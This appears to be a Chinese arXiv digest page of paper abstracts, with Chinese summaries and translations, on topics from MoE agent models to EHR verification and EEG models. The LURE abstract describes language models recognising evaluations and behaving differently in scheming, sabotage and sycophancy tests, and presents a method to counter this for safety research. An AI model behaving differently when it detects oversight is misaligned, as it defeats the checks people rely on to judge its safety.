Zhi Zhang, Zhichao Xu, Zhiheng Lv, Zhikang Xu, Zhitao He, Zhiwei He, Zhongyuan Li, Zibo Gao, Zijia Wu, Zijian Song, Zijian Zhou, Zijun Sun, Zishan Huang, Ziying Chen, Ziyue Ge

发表机构 * MiniMax

AI总结 提出MiniMax-M2系列混合专家语言模型,通过小激活参数实现前沿性能,核心包括智能体驱动数据管道、可扩展强化学习系统Forge及自进化检查点M2.7。

Comments Technical Report. 35 pages, 10 figures, 4 tables

详情
AI中文摘要

我们介绍了MiniMax-M2系列,这是一个基于“小激活可以释放最大现实智能”原则构建的混合专家语言模型家族。旗舰版M2总参数量为229.9B,每个token仅激活9.8B参数。M2系列专为智能体部署而端到端设计,包含三个组成部分:(i) 智能体驱动数据管道,生成大规模、可验证的轨迹,涵盖智能体编码和智能体协作,每个轨迹都基于可执行工作空间和与工件对齐的奖励;(ii) Forge,一个可扩展的智能体原生强化学习系统,适应长程智能体轨迹,并配有窗口FIFO调度、前缀树合并、推理优化以及支持白盒和黑盒智能体的干净训练-推理-智能体解耦;(iii) 最新的M2.7检查点向自我进化迈出了早期一步——自主调试训练运行并修改其自身框架。从M2到M2.7,这种组合将小激活足迹转化为智能体编码、深度搜索、办公任务和推理基准上的前沿性能。

英文摘要

We introduce the MiniMax-M2 series, a family of Mixture-of-Experts language models built around the principle that mini activations can unleash maximum real-world intelligence. The flagship M2 contains 229.9B total parameters with only 9.8B activated per token. Designed end-to-end for agentic deployment, the M2 series rests on three components: (i) agent-driven data pipelines producing large-scale, verifiable trajectories across agentic coding and agentic cowork, each grounded in an executable workspace and an artifact-aligned reward; (ii) Forge, a scalable agent-native RL system that adapts to long-horizon agent trajectories, paired with windowed-FIFO scheduling, prefix-tree merging, inference optimization, and a clean training-inference-agent decoupling that supports both white-box and black-box agents; (iii) the latest M2.7 checkpoint takes an early step toward self-evolution -- autonomously debugging training runs and modifying its own scaffold. Across M2 through M2.7, this combination translates a mini-activation footprint into frontier-tier performance on agentic coding, deep search, office-task, and reasoning benchmarks.

2605.26492 2026-05-27 cs.CL cs.AI cs.LG 版本更新

Elias in the Lighthouse, Again? Diagnosing Low Diversity in LLM Stories

灯塔中的伊莱亚斯,再次?诊断LLM故事中的低多样性

Sil Hamilton, David Mimno

发表机构 * Department of Information Science(信息科学系)

AI总结 研究通过采样20000个故事发现,LLM生成的故事中存在高度重复的词汇(如Elias、灯塔等),这些词汇来自偏好数据而非预训练数据,表明小数据集与强对齐算法的结合可能对多样性产生不成比例的影响。

详情
AI中文摘要

LLM生成的故事是一个流行的用例,但它们显示出非常低的变异性。我们使用五个提示从四个当前模型中采样了总共20,000个故事。我们发现,88.3%的生成故事中出现11个单词,模型之间差异很小。这些单词包括名字(Elias, Mara, Elara)、场景(灯塔)和职业(钟表匠、图书管理员)。这些标记在已发表的文献或预训练数据中并不常见,但在所有当前模型可能使用的偏好数据中却存在。令人惊讶的是,与平均后训练故事相比,这些“灯塔”故事并不常见,后训练故事中很多包含受版权保护的角色或成人内容。这一结果证明了小数据集与强大对齐算法结合可能产生的潜在不成比例影响。

英文摘要

LLM-generated stories are a popular use case, but they show very low variability. We sample 20,000 total stories from four current models using five prompts. We find that 11 words occur in 88.3% of generated stories, with little difference between models. These words include names (Elias, Mara, Elara), settings (lighthouses), and professions (clockmaker, librarian). These tokens do not often occur in published literature nor pre-training data, but they are found in preference data that is likely to have been used by all current models. Surprisingly, these "lighthouse" stories are infrequent when compared with the average post-training story, much of which contains references to copyrighted characters or adult content. This result demonstrates the potentially disproportionate impact of small datasets combined with powerful alignment algorithms.

2605.26478 2026-05-27 cs.RO cs.AI cs.CV cs.LG cs.SY eess.SY 版本更新

Efficient On-policy Visual-RL via Stochastic Decoupled Policy Gradient

基于随机解耦策略梯度的高效在策略视觉强化学习

Haoxiang You, Yilang Liu, Davis Zong, Qian Wang, Teeratham Vitchutripop, Qi Wang, Daniel Rakita, Ian Abraham

发表机构 * Yale University(耶鲁大学) Shanghai Jiao Tong University(上海交通大学) University of Sydney(悉尼大学)

AI总结 提出随机解耦策略梯度(SDPG)方法,通过轨迹滚动的随机扰动估计策略梯度,在单GPU上数小时内端到端训练多样化的视觉运动控制策略,显著降低计算和内存开销,并在视觉MuJoCo基准测试中优于基线方法。

详情
AI中文摘要

我们提出了随机解耦策略梯度(SDPG),一种轻量级的视觉强化学习方法,能够在单个NVIDIA RTX 4080 GPU上在数小时内端到端训练多样化的视觉运动控制策略。SDPG通过轨迹滚动的随机扰动估计策略梯度,所需批量渲染环境数量减少几个数量级,并显著降低计算和内存开销。在视觉MuJoCo基准测试中,SDPG在训练时间、内存使用和奖励方面始终优于基线方法。最后,为支持未来研究,我们引入了一套涵盖灵巧操作、具有挑战性的运动控制的逼真视觉机器人基准测试,并在物理硬件上展示了有效的仿真到现实迁移。

英文摘要

We present the stochastic decoupled policy gradient (SDPG), a lightweight visual reinforcement learning (RL) method that trains diverse visuomotor control policies end-to-end within a few hours on a single NVIDIA RTX 4080 GPU. SDPG estimates policy gradients via random perturbations of trajectory rollouts, requiring orders of magnitude fewer batch-rendered environments and substantially reducing compute and memory overhead. On visual MuJoCo benchmarks, SDPG consistently outperforms baseline methods in training time, memory usage, and rewards. Finally, to support future research, we introduce a suite of realistic visual robotics benchmarks spanning dexterous manipulation, challenging locomotion, and demonstrate effective sim-to-real transfer on physical hardware.

2605.26475 2026-05-27 cs.CV cs.AI 版本更新

Comparative Study of Vision-Based Metric Measurement for Large-Scale Planar Scenes

大规模平面场景的视觉度量测量比较研究

ZhiXin Sun

发表机构 * PowerChina Zhongnan Engineering Corporation Limited(中国电力工程顾问集团有限公司)

AI总结 本文针对大规模室外场景,使用PTZ相机比较了三种基于视觉的平面度量方法(单目测距、图像拼接和立体测距),分析了它们的精度和适用性。

详情
AI中文摘要

基于视觉的度量距离和面积测量在大规模室外环境中仍然具有挑战性,原因包括远距离感知、相机变焦和不稳定的成像条件。本文研究了在实际水库监测场景中使用PTZ相机的平面度量测量,并比较了三种代表性方法:基于几何的单目测距、带有鸟瞰变换的图像拼接以及使用两个联合校准的单目相机的立体测距。对于单目测距,从相机几何推导出平面定位模型,并分析了相机俯仰角的影响。研究了用于大面积映射的图像拼接,同时开发了一种无需专用立体硬件的立体方案用于远距离测量。实验显示了明确的权衡:单目测距在足够大的俯仰角下达到米级精度,立体测距达到分米级精度且对俯仰变化敏感性较低,图像拼接在小规模场景中有效,但随着场景增大稳定性和可扩展性下降。

英文摘要

Vision-based metric distance and area measurement remains challenging in large-scale outdoor environments due to long-range sensing, camera zoom, and unstable imaging conditions. This work studies planar metric measurement in a real-world reservoir monitoring scenario using PTZ cameras and compares three representative approaches: geometry-based monocular ranging, image stitching with birds-eye-view transformation, and stereo-based ranging using two jointly calibrated monocular cameras. For monocular ranging, planar localization models are derived from camera geometry and the effect of camera pitch angle is analyzed. Image stitching is investigated for large-area mapping, while a stereo-based scheme is developed for long-range measurement without dedicated stereo hardware. Experiments show clear trade-offs: monocular ranging achieves meter-level accuracy under sufficiently large pitch angles, stereo-based ranging achieves decimeter-level accuracy with reduced sensitivity to pitch variations, and image stitching is effective for small-scale scenes but degrades in stability and scalability as scene size increases.

2605.26468 2026-05-27 cs.LG cs.AI 版本更新

Diffuse to Detect: Generative Diffusion Models for Unsupervised IC Anomaly Detection

扩散检测:用于无监督IC异常检测的生成扩散模型

Yuxuan Yin, Chen He, Todd Jacobs, Jialei He, Boxun Xu, Robert Jin, Peng Li

发表机构 * Department of Electrical and Computer Engineering, University of California Santa Barbara, CA, USA(加州大学圣芭芭拉分校电子与计算机工程系)

AI总结 提出首个结合扩散Transformer的无监督异常检测框架,通过自编码器压缩、结构化令牌序列和噪声预测误差实现晶圆级快速筛选,在16nm IC测试数据上达到最优性能。

Comments 9 pages, 5 figures

详情
AI中文摘要

潜在缺陷筛选面临极低故障率、高维测试数据和缺乏标注异常的挑战。我们提出了首个结合扩散Transformer的无监督异常检测框架。原始测试测量值首先由自编码器压缩,然后重塑为结构化令牌序列,并加入正弦和每设备晶圆位置嵌入。异常分数来自中程扩散时间步上的噪声预测误差,从而无需任何标注缺陷或手动特征工程即可实现快速晶圆级筛选。我们的方法在极端类别不平衡下的工业16nm IC测试数据上达到了最先进的性能,并通过潜在空间重建残差提供可解释的故障定位。

英文摘要

Latent defect screening is challenged by extremely low failure rates, high-dimensional test data, and absence of labeled anomalies. We propose the first unsupervised anomaly detection framework incorporating a Diffusion Transformer. Raw test measurements are first compressed by an autoencoder, then reshaped into a structured token sequence enriched with sinusoidal and per-device wafer-position embeddings. Anomaly scores are derived from the noise-prediction error over mid-range diffusion timesteps, enabling fast wafer-scale screening without any labeled defects or manual feature engineering. Our approach achieves state-of-the-art performance on industrial 16nm IC test data under extreme class imbalance, offering interpretable failure localization through latent-space reconstruction residuals.

2605.26463 2026-05-27 cs.CL cs.AI 版本更新

Towards Error-Free EHRs: Reasoning-Intensive Consistency Verification Between Clinical Notes and Structured Tables in Electronic Health Records

迈向无差错的电子健康记录:临床笔记与结构化表格之间的推理密集型一致性验证

Yeonsu Kwon, Jiho Kim, Junseong Choi, Paloma Rabaey, Minseo Kim, Sujeong Im, Jeewon Yang, Jun-Min Lee, Sangji Lee, Jiwon Kim, Hangyul Yoon, Hyunwook Kwon, Edward Choi

发表机构 * KAIST(韩国科学技术院) Ghent University(根特大学) Samsung Medical Center(三星医疗中心) Samsung Changwon Hospital(三星昌原医院) Asan Medical Center(亚山医疗中心)

AI总结 针对电子健康记录中临床笔记与结构化表格数据不一致的问题,提出推理密集型基准EHR-ReasonCon和基于大语言模型的框架EHR-Inspector,通过锚点实体提取、时间引用和表格探索工具实现高效一致性验证。

详情
AI中文摘要

电子健康记录中非结构化临床笔记与结构化表格之间的数据一致性对于患者安全和临床决策至关重要。然而,现有关于笔记-表格一致性验证的工作主要依赖于数值或简单事件的表面匹配。这些方法未能捕捉真实世界EHR文档背后的推理,包括临床解释、事件关系和时间变化。为弥补这一差距,我们引入了EHR-ReasonCon,一个用于笔记-表格一致性验证的推理密集型基准。它基于MIMIC-III构建,并经过专家指导的注释,包含来自临床笔记的8,048个实体,并提供高质量的真实标签。注释协议由专门的表格探索工具支持,以确保系统的证据检索和可靠的一致性评估。我们还提出了EHR-Inspector,一个基于LLM的框架,它分割笔记、提取锚点实体和时间引用,并使用表格探索工具与结构化表格进行一致性验证。在严格和宽松标准下,使用经过专家验证的LLM-as-a-judge指标进行评估,EHR-Inspector在多个模型骨干上实现了最先进的性能。进一步的分析证明了其组件的有效性,并突出了与人工验证的差异。

英文摘要

Data consistency between unstructured clinical notes and structured tables in Electronic Health Records (EHRs) is essential for patient safety and clinical decision-making. However, existing work on note-table consistency verification mainly relies on surface-level matching of numeric values or simple events. Such approaches fail to capture the reasoning underlying real-world EHR documentation, including clinical interpretation, event relations, and temporal changes. To address this gap, we introduce EHR-ReasonCon, a reasoning-intensive benchmark for note-table consistency verification. Built on MIMIC-III with expert-guided annotations, it comprises 8,048 entities derived from clinical notes and provides high-quality ground-truth labels. The annotation protocol is supported by specialized table-exploration tools to ensure systematic evidence retrieval and reliable consistency assessment. We also propose EHR-Inspector, an LLM-based framework that segments notes, extracts anchor entities and temporal references, and uses table-exploration tools to verify consistency against structured tables. Evaluated using expert-validated LLM-as-a-judge metrics under harsh and lenient criteria, EHR-Inspector achieves state-of-the-art performance across multiple model backbones. Analyses further demonstrate the effectiveness of its components and highlight differences from human verification.

2605.26460 2026-05-27 cs.CV cs.AI 版本更新

AnchorDiff: Training-Free Concept Grounding for MM-DiTs via Anchor-Based Graph Propagation

AnchorDiff: 基于锚点图传播的无训练概念定位用于多模态扩散Transformer

Jian Zhang, Zhijun Zhang

发表机构 * School of Automation Science and Engineering(自动化科学与工程学院)

AI总结 提出AnchorDiff方法,通过锚点选择和混合图传播解耦语义定位与结构细化,解决多模态扩散Transformer中视觉混淆概念间的概念泄漏问题。

详情
AI中文摘要

多模态扩散Transformer(MM-DiTs)为无训练概念定位编码了丰富的表示,但现有的基于注意力的方法通常在视觉上易混淆的概念上产生重叠激活,这种失败模式我们称为概念泄漏,即目标响应溢出到非目标对象。为了解决这个问题,我们提出了AnchorDiff,一种无训练的定位方法,将语义定位与结构细化解耦。AnchorDiff从概念到图像的注意力图中选择一个高置信度锚点,并将其作为独热种子在从图像到图像自注意力导出的混合图上传播。该图利用输出空间相似性进行密集的物体内传播,并通过逐行注意力门抑制跨物体连接。此外,我们引入了多概念混淆数据集,其中包含具有多个视觉相似概念和独立掩码的图像,从而能够显式评估概念泄漏。实验表明,AnchorDiff在ImageNet-Segmentation和PascalVOC上实现了强大的定位性能,同时在我们的多概念混淆数据集上显著减少了概念泄漏。

英文摘要

Multi-Modal Diffusion Transformers (MM-DiTs) encode rich representations for training-free concept grounding, but existing attention-based methods often produce overlapping activations on visually confusable concepts, a failure mode we call concept leakage, where target responses spill over to non-target objects. To address this issue, we propose AnchorDiff, a training-free grounding method that decouples semantic localization from structural refinement. AnchorDiff selects a high-confidence anchor from concept-to-image attention map and propagates it as a one-hot seed over a hybrid graph derived from image-to-image self-attention. The graph uses output-space similarity for dense within-object propagation and a row-wise attention gate to suppress cross-object connections. Additionally, we introduce the Multi-Concept Confusion Dataset, which contains images with multiple visually similar concepts and separate masks, enabling explicit evaluation of concept leakage. Experiments show that AnchorDiff achieves strong grounding performance on ImageNet-Segmentation and PascalVOC, while substantially reducing concept leakage on our Multi-Concept Confusion Dataset.

2605.26457 2026-05-27 cs.SE cs.AI cs.CL cs.PL 版本更新

Verus-SpecGym: An Agentic Environment for Evaluating Specification Autoformalization

Verus-SpecGym: 用于评估规范自动形式化的智能体环境

Anmol Agarwal, Natalie Neamtu, Pranjal Aggarwal, Seungone Kim, Jannis Limperg, Cedric Flamant, Kanna Shimizu, Bryan Parno, Sean Welleck

发表机构 * CMU(卡内基梅隆大学) Amazon(亚马逊)

AI总结 提出 Verus-SpecGym 环境与 Verus-SpecBench 基准,通过执行规范机制和对抗性测试评估 LLM 智能体将非正式编程问题转化为形式规范的能力,发现前沿模型可解决 77.8% 的任务但存在遗漏假设等脆弱性。

Comments Preprint

详情
AI中文摘要

AI 编码智能体越来越多地用于编写真实世界的软件,但确保其输出正确性仍然是一个基本挑战。形式化验证提供了一条有希望的路径:智能体生成代码的同时生成机器检查的证明,保证代码满足形式规范。然而,无法保证形式规范本身与用户意图一致。在这项工作中,我们研究规范自动形式化:LLM 智能体能否将非正式编程问题转化为忠实的形式规范。我们引入了 Verus-SpecBench,一个包含 581 个规范编写任务的基准,这些任务源自针对 Rust 验证器 Verus 的 Codeforces 问题,以及 Verus-SpecGym,一个智能体环境,模型在其中与 Verus、bash 和文件系统交互以开发这些规范。核心挑战在于评估:专家编写的参考规范编写成本高昂,LLM 评判者可能遗漏细微错误。我们通过以下方式解决这一问题:(a) 扩展 Verus 的 exec_spec 机制,使生成的规范可以作为 Rust 代码执行;(b) 针对官方 Codeforces 测试和从 Codeforces "hacks"(即竞争对手编写的用于破解不正确解决方案的边缘情况)中提取的对抗性案例进行测试。在 Verus-SpecBench 上,最强的模型 Gemini 3.1 Pro 解决了 77.8% 的任务,其他前沿模型解决了 51.1-57.8%,而开源模型仅达到 21.5-25.5%。我们对失败模式的分析表明,模型生成的规范可能遗漏重要的输入假设、接受不正确的输出以及拒绝有效的输出。我们还发现,LLM 作为评判者的评估遗漏了我们评估者捕获的 26% 的失败。总体而言,我们的结果表明,规范自动形式化对于前沿智能体来说是可行的,但即使在它们已经能够生成正确代码的问题上仍然脆弱。代码、数据和日志可在 https://github.com/formal-verif-is-cool/verus-spec-gym 获取。

英文摘要

AI coding agents are increasingly used to write real-world software, but ensuring that their outputs are correct remains a fundamental challenge. Formal verification offers a promising path: an agent generates code together with a machine-checked proof, guaranteeing that the code satisfies a formal specification. However, there is no guarantee that the formal spec itself matches the user's intent. In this work, we study specification autoformalization: whether LLM agents can translate informal programming problems into faithful formal specifications. We introduce Verus-SpecBench, a benchmark of 581 spec-writing tasks derived from Codeforces problems targeting Verus, a verifier for Rust, and Verus-SpecGym, an agentic environment in which models interact with Verus, bash, & the filesystem to develop these specs. The central challenge is evaluation: expert-written reference specs are expensive to write, & LLM judges can miss subtle mistakes. We address this by (a) extending Verus's exec_spec mechanism so that generated specs can be executed as Rust code, & (b) testing them against official Codeforces tests & adversarial cases extracted from Codeforces "hacks", which are edge cases written by competitors to break incorrect solutions. On Verus-SpecBench, the strongest model, Gemini 3.1 Pro, solves 77.8% of tasks, other frontier models solve 51.1--57.8% & OSS models reach only 21.5--25.5%. Our analysis of failure modes shows that model-generated specs can omit important input assumptions, accept incorrect outputs, & reject valid ones. We also find that LLM-as-a-judge evaluation misses 26% of the failures our evaluator catches. Overall, our results suggest that spec autoformalization is within reach for frontier agents but remains brittle even on problems where they can already generate correct code. The code, data, & logs can be found at https://github.com/formal-verif-is-cool/verus-spec-gym

2605.26449 2026-05-27 cs.CV cs.AI 版本更新

Cross-scale Aligned Supervision for Training GANs

跨尺度对齐监督用于训练生成对抗网络

Sangeek Hyun, MinKyu Lee, Jae-Pil Heo

发表机构 * Sungkyunkwan University(全北大学)

AI总结 针对GAN多尺度生成中跨尺度轨迹未对齐问题,提出CAT(跨尺度对齐Transformer),通过生成器侧一致性正则化对齐中间输出与最终输出,在ImageNet-256上实现FID-50K为1.56。

Comments Preprint

详情
AI中文摘要

现代GAN通常在中间生成器输出上引入对抗性监督,并将由此产生的多阶段合成解释为从粗到细的分层生成。在这项工作中,我们挑战了这一解释。我们认为标准的尺度级对抗监督并未构建适当的从粗到细的层次结构:每个中间图像被独立地推向其自身分辨率下的真实分布,但这种尺度级的真实性并不能确保各阶段的输出代表相同的生成样本。此外,每个阶段产生的特定尺度图像并未用作后续阶段的明确细化目标。因此,其对抗性损失可以改善特定尺度的输出,而不约束后续阶段保持相同的样本轨迹,允许它们转向不同的样本而不是细化先前的输出。我们将此问题称为跨尺度轨迹未对齐问题。为了解决这个问题,我们提出了CAT,一种用于多尺度对抗生成的跨尺度对齐Transformer。CAT保持判别器尺度级,因此每个中间输出在其自身分辨率下被评估,同时添加一个简单的生成器侧一致性正则化,以对齐中间输出与最终输出。在类别条件ImageNet-256上,CAT-H/2在仅60个训练周期后,通过一步推理实现了1.56的FID-50K,优于强大的单步GAN和扩散/流基线。

英文摘要

Modern GANs often introduce adversarial supervision on intermediate generator outputs and interpret the resulting multi-stage synthesis as coarse-to-fine hierarchical generation. In this work, we challenge this interpretation. We argue that standard scale-wise adversarial supervision does not construct a proper coarse-to-fine hierarchy: each intermediate image is independently pushed toward the real distribution at its own resolution, but this scale-wise realism does not ensure that outputs across stages represent the identical generated sample. Moreover, the scale-specific image produced at each stage is not used as an explicit refinement target for the subsequent stage. Therefore, its adversarial loss can improve a scale-specific output without constraining later stages to preserve the same sample trajectory, allowing them to move toward a different sample rather than refine the previous output. We refer to this problem as a cross-scale trajectory misalignment problem. To resolve it, we propose CAT, a Cross-scale Aligned Transformer for multi-scale adversarial generation. CAT keeps the discriminator scale-wise, so each intermediate output is evaluated at its own resolution, while adding a simple generator-side consistency regularization that aligns intermediate outputs with the final output. On class-conditional ImageNet-256, CAT-H/2 achieves an FID-50K of 1.56 with one-step inference after only 60 training epochs, outperforming strong one-step GAN and diffusion/flow baselines.

2605.26446 2026-05-27 cs.LG cs.AI 版本更新

DDGAD: Trajectory Dynamics for Diffusion-Based Graph Anomaly Detection

DDGAD:基于扩散的图异常检测中的轨迹动力学

Yuxin Yang, Limei Hu, Feng Chen

发表机构 * College of Artificial Intelligence(人工智能学院) Southwest University(西南大学)

AI总结 提出DDGAD框架,利用扩散正则化和可靠性感知邻域共识下的轨迹动力学区分正常与异常节点,通过三种互补异常信号检测异常。

详情
AI中文摘要

图异常检测(GAD)旨在识别图结构数据中行为或属性显著偏离整体模式的节点或子结构,在金融风险控制、社交网络分析和网络安全等领域具有关键应用。然而,现有的基于GCN的方法存在污染传播的根本问题,即异常节点通过消息传递污染其邻居的表示,导致检测性能下降。本文提出DDGAD,一种新颖的基于扩散的图异常检测框架,利用轨迹动力学区分正常和异常节点。我们的关键洞察是,在扩散正则化和可靠性感知邻域共识的耦合作用下,正常节点表现出一致且稳定的表示轨迹,而异常节点由于全局流形先验与局部污染消息传递之间的方向不一致,表现出不稳定且冲突的动力学。为了减轻污染传播,我们引入了一种分布式的可靠性感知共识细化机制,并定义了三种互补的异常信号:邻居不一致性、可靠性权重和动力学冲突能量。我们进一步对耦合动力学下的正常节点稳定性进行了初步的理论分析。这些信号从局部不一致性、共识可靠性和动力学不稳定性角度共同刻画异常行为。在五个真实世界数据集上的大量实验证明了所提框架的有效性。

英文摘要

Graph anomaly detection (GAD) aims to identify nodes or substructures whose behavior or attributes deviate significantly from the overall pattern in graph-structured data, with critical applications in financial risk control, social network analysis, and cybersecurity. However, existing GCN-based methods suffer from the fundamental problem of contamination propagation, where anomalous nodes pollute the representations of their neighbors through message passing, leading to degraded detection performance. In this paper, we propose DDGAD, a novel diffusion-based graph anomaly detection framework that leverages trajectory dynamics to distinguish normal and anomalous nodes. Our key insight is that normal nodes exhibit consistent and stable representation trajectories under the coupled effects of diffusion regularization and reliability-aware neighborhood consensus, while anomalous nodes exhibit unstable and conflicting dynamics due to the directional disagreement between the global manifold prior and locally contaminated message passing. To mitigate contamination propagation, we introduce a distributed reliability-aware consensus refinement mechanism and define three complementary anomaly signals: neighbor inconsistency, reliability weight, and dynamical conflict energy. We further provide a preliminary theoretical analysis on normal node stability under the coupled dynamics. These signals collectively characterize anomalous behaviors from the perspectives of local inconsistency, consensus reliability, and dynamical instability. Extensive experiments on five real-world datasets demonstrate the effectiveness of the proposed framework.

2605.26442 2026-05-27 cs.CL cs.AI 版本更新

Alignment Tuning for Large Language Models: A Data-Centric Lens on Alignment Data Pipelines

大型语言模型的对齐调优:以数据为中心的对齐数据管道视角

Hwanjun Song

发表机构 * KAIST(韩国科学技术院)

AI总结 本文以数据为中心,将对齐调优重构为管道设计问题,分解为响应合成、偏好评估和偏好实例化三个阶段,并基于此框架统一分类现有对齐方法,总结设计权衡与失败模式,提炼高层原则,最后指出开放挑战。

Comments Accepted at the Findings of ACL 2026

详情
AI中文摘要

对齐调优文献大多围绕优化目标组织,而对齐数据的构建往往被隐式处理。在本综述中,我们采用以数据为中心的视角,将对齐调优重构为管道设计问题。我们将对齐数据构建分解为三个相互作用的阶段:响应合成、偏好评估和偏好实例化,并利用此框架将现有对齐方法组织成统一的分类体系。通过这一视角,我们识别出先前对齐方法中反复出现的设计权衡和失败模式,并提炼出一套高层原则,阐明管道设计选择如何影响最终的优化信号。最后,我们概述了对齐数据管道的开放挑战,包括提示级对齐、智能体设置以及目标演化下的对齐。

英文摘要

Much of the alignment tuning literature is organized around optimization objectives, while the construction of alignment data is often treated implicitly. In this survey, we adopt a data centric perspective and reframe alignment tuning as a pipeline design problem. We decompose alignment data construction into three interacting stages, response synthesis, preference evaluation, and preference instantiation, and use this framework to organize existing alignment methods into a unified taxonomy. Through this lens, we identify recurring design trade-offs and failure modes observed across prior alignment methods, and distill a set of high level principles that clarify how pipeline design choices influence the resulting optimization signal. Finally, we outline open challenges for alignment data pipelines, including prompt-level alignment, agentic settings, and alignment under evolving objectives.

2605.26441 2026-05-27 cs.CV cs.AI 版本更新

Rethinking Weakly-supervised Video Temporal Grounding From a Game Perspective

从博弈视角重新思考弱监督视频时间定位

Xiang Fang, Zeyu Xiong, Wanlong Fang, Xiaoye Qu, Chen Chen, Jianfeng Dong, Keke Tang, Pan Zhou, Yu Cheng, Daizong Liu

发表机构 * Hubei Key Laboratory of Distributed System Security(湖北分布式系统安全重点实验室) Hubei Engineering Research Center on Big Data Security(大数据安全工程研究中心) School of Cyber Science and Engineering(网络安全科学与工程学院) Huazhong University of Science and Technology(华中科技大学) University of Central Florida(佛罗里达中央大学) Zhejiang Gongshang University(浙江工商大学) Guangzhou University(广州大学) The Chinese University of Hong Kong(香港中文大学) Peking University(北京大学)

AI总结 本文从博弈论视角出发,通过多元合作博弈建模帧与词的不确定对应关系,实现多级跨模态交互,从而在弱监督下提升视频时间定位的准确性。

Comments Published in ECCV 2024

详情
AI中文摘要

本文针对弱监督视频时间定位这一具有挑战性的任务。现有方法通常基于时刻提案选择框架,利用对比学习和重构范式对预定义时刻提案进行评分。尽管取得了显著进展,但我们认为当前框架忽略了两个不可或缺的问题:1) 粗粒度跨模态学习:先前方法仅捕获全局视频级与查询的对齐,未能建模视频帧与查询词之间的详细一致性以准确定位时刻边界。2) 复杂的时刻提案:其性能严重依赖于提案的质量,而提案的选择既耗时又复杂。为此,本文首次尝试从新颖的博弈视角处理该任务,通过多样粒度和灵活组合有效学习每个视觉-语言对之间的不确定关系,实现多级跨模态交互。具体而言,我们创造性地将每个视频帧和查询词建模为多元合作博弈中的玩家,学习它们对跨模态相似度得分的贡献。通过博弈论交互量化联盟内帧-词合作的趋势,我们能够评估帧与词之间所有不确定但可能的对应关系。最后,我们不再使用时刻提案,而是利用学习到的查询引导的帧级得分进行更好的时刻定位。实验表明,我们的方法在Charades-STA和ActivityNet Caption数据集上均取得了优越性能。

英文摘要

This paper addresses the challenging task of weakly-supervised video temporal grounding. Existing approaches are generally based on the moment proposal selection framework that utilizes contrastive learning and reconstruction paradigm for scoring the pre-defined moment proposals. Although they have achieved significant progress, we argue that their current frameworks have overlooked two indispensable issues: 1) Coarse-grained cross-modal learning: previous methods solely capture the global video-level alignment with the query, failing to model the detailed consistency between video frames and query words for accurately grounding the moment boundaries. 2) Complex moment proposals: their performance severely relies on the quality of proposals, which are also time-consuming and complicated for selection. To this end, in this paper, we make the first attempt to tackle this task from a novel game perspective, which effectively learns the uncertain relationship between each vision-language pair with diverse granularity and flexible combination for multi-level cross-modal interaction.Specifically, we creatively model each video frame and query word as game players with multivariate cooperative game theory to learn their contribution to the cross-modal similarity score. By quantifying the trend of frame-word cooperation within a coalition via the game-theoretic interaction, we are able to value all uncertain but possible correspondence between frames and words. Finally, instead of using moment proposals, we utilize the learned query-guided frame-wise scores for better moment localization.Experiments show that our method achieves superior performance on both Charades-STA and ActivityNet Caption datasets.

2605.26438 2026-05-27 cs.CL cs.AI 版本更新

LURE: Live-Usage Replay Evaluations for Reducing Evaluation Awareness

LURE: 减少评估感知的实时使用回放评估

Igor Ivanov, David Demitri Africa

发表机构 * Meridian Cambridge(梅里登剑桥)

AI总结 提出LURE方法,通过回放真实代理交互轨迹并附加评估提示来构建类似部署的评估,以减少大语言模型的评估感知,并引入自动化评估真实性流程。

详情
AI中文摘要

大型语言模型能够识别自己正在被评估(评估感知),并因此表现出不同的行为,这破坏了安全和对齐基准的有效性。我们提出LURE(实时使用回放评估),一种通过回放真实的代理交互轨迹并在末尾附加评估提示来构建类似部署的评估的方法。我们还引入了一个自动化流程来衡量评估的真实性,结合了对口头化评估感知的检测和法官模型对日志是否为评估的概率估计,并在一个包含部署和评估记录的大型数据集上进行了验证。我们发现,与广泛使用的基准和合成评估生成器相比,基于LURE的评估与部署的区分度显著降低,并且可以接近与用户真实对话的真实性。我们在策划、AI安全破坏和谄媚场景中实例化了LURE。我们的结果表明,评估真实性是对齐基准的一个关键属性,应在基准结果旁边报告,特别是当这些结果用于安全案例时。

英文摘要

Large language models can recognize when they are being evaluated (evaluation awareness) and behave differently because of that, which undermines the validity of safety and alignment benchmarks. We propose LURE (Live-Usage Replay Evaluations), a method for constructing deployment-like evaluations by replaying realistic agentic interaction trajectories and appending evaluation prompt at the end. We also introduce an automated pipeline for measuring evaluation realism, combining detection of verbalized evaluation awareness and judge-model estimates of the probability of logs being an evaluation, and validate it on a large dataset of deployment and evaluation transcripts. We find that LURE-based evaluations are substantially less distinguishable from deployment than widely used benchmarks and synthetic evaluation generators, and can approach the realism of real conversations with users. We instantiate LURE in scheming, AI safety sabotage, and sycophancy settings. Our results suggest that evaluation realism is a crucial property of alignment benchmarks and should be reported alongside benchmark results, especially when such results are used in safety cases.

2605.26434 2026-05-27 cs.LG cs.AI 版本更新

Aperiodic and Low-Frequency Spectral Bias in Reconstruction based EEG Foundation Models

基于重建的脑电图基础模型中的非周期和低频谱偏差

Aditya Kommineni, Emily Zhou, Kleanthis Avramidis, Simon Bock Segaard, Jeppe Roden Münster, Andreas Peter Juhl Hansen, Takfarinas Medani, Tiantian Feng, Richard Leahy, Shrikanth Narayanan

发表机构 * University of Southern California(美国南加州大学) Aalborg University(奥尔堡大学)

AI总结 研究揭示基于重建预训练的脑电图基础模型存在非周期和低频成分偏差,导致低资源场景下性能不佳,并提出通过辅助损失关注高频振荡结构来改进。

Comments 18 pages, 13 figures, 3 tables

详情
AI中文摘要

脑电图基础模型在大规模无标签脑电图数据上预训练,已成为学习可泛化脑电图表示的有前景方向。尽管在数据丰富场景下表现积极,但在低资源设置中,它们往往无法显著优于完全监督的小型模型。我们对此缺陷提供了机制性解释,将其归因于基于重建的预训练任务与脑电图信号独特的频谱结构之间的根本性不匹配,该结构分解为高功率非周期成分和低功率振荡成分。通过使用受控的合成脑电图输入,我们证明脑电图基础模型嵌入偏向于捕捉脑电图信号的非周期成分,而低估振荡成分,尤其是高频成分。此外,在真实BCI数据集上的线性探针评估进一步揭示,嵌入比任务相关信息更强烈地编码受试者身份,从而强化了主要基于重建目标训练的基础模型嵌入中的低频和非周期成分偏差。这些发现共同阐明了基于重建的脑电图基础模型中的一种失败模式,并激励未来工作纳入明确针对高频振荡结构的辅助损失,作为实现更强大和可泛化的脑电图表示的途径。

英文摘要

